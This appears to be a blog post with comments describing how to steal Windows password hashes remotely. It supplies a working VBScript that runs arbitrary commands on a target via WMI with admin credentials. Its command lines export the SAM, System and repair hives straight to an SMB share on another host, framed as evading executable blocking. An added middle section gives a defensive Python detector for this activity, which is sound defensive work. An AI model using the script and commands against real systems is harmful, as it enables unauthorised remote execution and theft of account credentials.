The commands are simple:
reg save HKLM\SAM <filename>
reg save HKLM\System <filename>
You can then import these files in Ophcrack (File->Load->'Read encrypted SAM' option), which should output some nice hashes for you to crack.
Now how to run remotely? PSExec is one option, but with WMI and VBScript, it is possible to run any remote command (and has been since Windows 2000). I prefer this method for a couple of reasons - it does not require any services or files to be copied across to the target host, and it still works in [some] situations where SRP or products such as Sanctuary are configured to block local executables from running.
The code is fairly straightforward, and mainly taken from various MSDN articles:
Option Explicit
Dim target, username, password, strCommand, objSWbemLocator, objSWbemServices, objProcess, intProcessID, errReturn

' Expect exactly four arguments: target host, credentials and the command line to run
If WScript.Arguments.Count = 4 Then
    target = WScript.Arguments.Item(0)
    username = WScript.Arguments.Item(1)
    password = WScript.Arguments.Item(2)
    strCommand = WScript.Arguments.Item(3)
Else
    WScript.Echo "Usage: vbExec.vbs target username password command"
    WScript.Quit
End If

' Connect to the WMI service on the target over DCOM (no agent or file copy required)
Set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
Set objSWbemServices = objSWbemLocator.ConnectServer(target, "root\cimv2", username, password)
' wbemImpersonationLevelImpersonate (3): the provider runs with the caller's identity
objSWbemServices.Security_.ImpersonationLevel = 3
' wbemAuthenticationLevelPktPrivacy (6): DCOM traffic is authenticated and encrypted
objSWbemServices.Security_.AuthenticationLevel = 6

' Win32_Process.Create starts the command on the target; the new PID comes back by reference
Set objProcess = objSWbemServices.Get("Win32_Process")
errReturn = objProcess.Create(strCommand, Null, Null, intProcessID)
If errReturn = 0 Then
    WScript.Echo "Process was started with ID: " & intProcessID
Else
    WScript.Echo "Process could not be started due to error: " & errReturn
End If
Download from here.
So if you want to grab the SAM, or run any other command for that matter, you can do something like this:
vbsExec.vbs 192.168.0.1 user password "reg save HKLM\SAM \\192.168.0.2\writeable_share\SAM"
vbsExec.vbs 192.168.0.1 user password "reg save HKLM\System \\192.168.0.2\writeable_share\System"
vbsExec.vbs <target> <username> <password> <command>
NB: The above examples write the output from the reg save command straight to a remote SMB share - no need to touch the file system on the target at all!
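From the defender's side, the two things worth alerting on here are the launch path (anything started through Win32_Process.Create has WmiPrvSE.exe as its parent) and the command itself (a reg save of a credential hive, or a copy from the repair directory, with output going to a UNC share). The following is an added detection example, not code from the post, run over constructed Sysmon Event ID 1 style records; the field names Image, CommandLine and ParentImage are the real Sysmon ones, the record values are made up.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 fields), not real telemetry.
# The first two mimic what the WMI launch above produces on the target.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SAM \\192.168.0.2\writeable_share\SAM",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c copy c:\windows\repair\SAM \\192.168.0.2\writeable_share\SAM",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# reg save of the hives that hold local account secrets
HIVE_DUMP = re.compile(r"reg(?:\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)\b", re.I)
# access to the backup copies under %SystemRoot%\repair
REPAIR_COPY = re.compile(r"\\repair\\(SAM|SYSTEM|SECURITY)\b", re.I)
# any \\host\share\... path on the command line
UNC_PATH = re.compile(r"\\\\[\w.\-]+\\[^\s]+")
WMI_HOST = "wmiprvse.exe"


def classify(event):
    """Return the list of reasons this process-creation record is suspicious (empty if none)."""
    reasons = []
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent == WMI_HOST:
        reasons.append("spawned by WMI provider host (remote Win32_Process.Create)")
    m = HIVE_DUMP.search(cmd)
    if m:
        reasons.append(f"registry hive export: {m.group(1).upper()}")
    m = REPAIR_COPY.search(cmd)
    if m:
        reasons.append(f"backup hive access: repair\\{m.group(1).upper()}")
    # Only escalate the UNC check once something else already looks wrong
    if reasons and UNC_PATH.search(cmd):
        reasons.append("output written to a UNC share")
    return reasons


def scan(events):
    """Return (index, reasons) for every record that triggers at least one rule."""
    hits = []
    for i, e in enumerate(events):
        reasons = classify(e)
        if reasons:
            hits.append((i, reasons))
    return hits
```

Running scan(SAMPLE_EVENTS) flags the first two records, each with the WMI parent, the hive access and the UNC destination; the reg query and notepad records pass clean.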
Of course, it is worth copying the repair SAM/System files at the same time, which you can do with the following commands:
vbsExec.vbs 192.168.0.1 user password "copy c:\windows\repair\SAM \\192.168.0.2\writeable_share\SAM"
vbsExec.vbs 192.168.0.1 user password "copy c:\windows\repair\System \\192.168.0.2\writeable_share\System"
Enjoy :)
Can it be done with limited user rights??
Admin only I'm afraid
Nice one.